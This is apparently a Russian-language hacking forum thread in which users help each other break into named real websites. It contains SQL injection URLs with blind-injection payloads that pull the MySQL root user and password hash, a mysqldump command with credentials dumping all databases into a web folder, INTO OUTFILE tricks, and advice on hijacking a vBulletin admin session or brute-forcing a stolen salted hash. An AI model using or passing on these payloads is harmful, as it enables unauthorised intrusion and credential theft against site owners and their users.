Вот ошибка www.uro.net.ua/index.php?act=idx&st=-5 - Раскрутить не удается,вообще нивкакую нехочет!!!

SELECT post_id,title,date FROM eA_cp.mainnews ORDER by date DESC LIMIT -5,5
Инъекция в limit после order by.
ничего не сделаешь тут.

В общем есть такой скриптик, там можно управлять базой, но тока при помощи команд, это не пхпмайадмин..

Просто вводиш команду и тебя слушается база...


Вот такой вопрос, как сделать через команду sql чтобы сделать бэкап базы?

К примеру сделать бэкап базы в /www/files

Очень нужно, прошу помочь, с меня +

Скажу сразу, там кароче любые команды идут sql, не знаю логина и пароль админа, но пробовал select from.. всё идёт! Что подскажете?

делал бэкап дб таким способом:

mysqldump -utracker -ptester. --all-databases > /www/tracker/stats/fuckme.sql

Выбило:

Shell command: mysqldump -utracker -paaa67&1!a. --all-databases > /www/tracker/stats/fuckme.sql

Usage: mysqldump [OPTIONS] database [tables]
OR mysqldump [OPTIONS] --databases [OPTIONS] DB1 [DB2 DB3...]
OR mysqldump [OPTIONS] --all-databases [OPTIONS]
For more options, use mysqldump --help


Что не так ? :(

Смотря что за субд. В мускуле делается так:

select * from jops where name='12' into outfile '/www/files/dump.txt'
или into dumpfile

-utracker -ptester. -А чего это такое?
mysqldump --all-databases > all_databases.sql - Так мне кажется проще...

Здравствуйте уважаемые пользователи antichat.
У меня к вам вопрос. Точнее ситуация, надеюсь, вы поможете мне ее разрешить, т. к ранее я с cookies не сталкивался.

Вообщем есть сайт назовем его “x”. На его форуме движок, которого vBulletin v3.5.4.
Я имею логин администратора и его пароль в зашифровки (извлек из базы).

Так вот как мне подставить cookies? Я понимаю, что это делать надо, наверное, через Opera, но, сколько не пытался, не получалось. Помогите, пожалуйста.

Заранее огромное спасибо!

поставь себе денвер, поставь туда булку. и снифай через привокси или аналогичную программу запросы. потом аналогично проделай на нужном тебе сайте.

лучше извлеки из БД ещё и соль и пробрути хеш. По кукам просто в админку не войдёшь - там повторная авторизация

ку всем
моя первая инъекция:
http://www.mega-porno.ru/signup.php/data:text/index.php?category=1'
не могу подобрать поля, может кто подскажет че да как?!?!?!

http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+(select+1)=1+and+(banne rs.cat_link.cat_id='1
Чтоб интересней было

MyTHblu,

http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+ascii(substring((select +user+from+mysql.user+limit+0,1),4,1))=116+--+

user - root

http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+ascii(substring((select +password+from+mysql.user+limit+0,1),4,1))>=10+--+

а хеш сам )